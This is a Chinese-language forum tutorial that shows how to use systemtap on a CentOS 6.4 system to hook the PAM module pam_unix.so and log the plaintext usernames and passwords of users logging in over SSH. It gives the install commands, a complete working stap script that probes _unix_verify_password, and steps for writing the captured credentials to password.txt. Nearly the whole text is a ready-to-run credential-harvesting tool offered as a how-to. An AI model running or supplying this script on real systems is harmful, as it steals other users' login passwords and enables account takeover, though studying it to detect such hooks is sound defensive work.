systemtap是一款非常強大內核調試工具,可以debug很多關於kernel層的問題。Linux是通過PAM模塊檢測用戶信息和認證信息的,從而確定一個用戶是否可以登錄系統,利用這個知識點,使用systemtap捕獲一下pam_unix.so該動態庫文件的函數調用,獲得用戶在ssh遠程登錄時的用戶名和密碼吧。
測試環境:CentOS6.4 32bit
內核版本:2.6.32-358.el6.i686
首先安裝以下rpm包
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
創建文件,寫入以下代碼
touch /root/capture_pass.stp
· #!/usr/bin/stap
· global username, pass, isSuccRet = 1;
· probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
· {
· username = user_string($name);
· pass = user_string($p);
· }
· probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
· {
· if ($return == 0)
· {
· printf("User: %s\nPassword: %s\n\n", username, pass);
· isSuccRet = 0;
· }
· }
· probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
· {
· if (isSuccRet != 0)
· {
· printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);
· }
· isSuccRet = 1;
· }
賦予可執行權限
chmod +x capture_pass.stp
創建一個記錄密碼的文件
touch password.txt
執行systemstap腳本
stap capture_pass.stp -o password.txt
本地執行capture_pass.stp腳本,同時ssh遠程登錄系統,即使第一次登錄失敗也沒有問題,不會記錄嘗試輸入的錯誤密碼。登錄成功後ctl+C終止腳本運行,查看password.txt,成功捕獲。systemstap很強大的利器,所以只有超戶可以使用。
來自:https://forum.90sec.org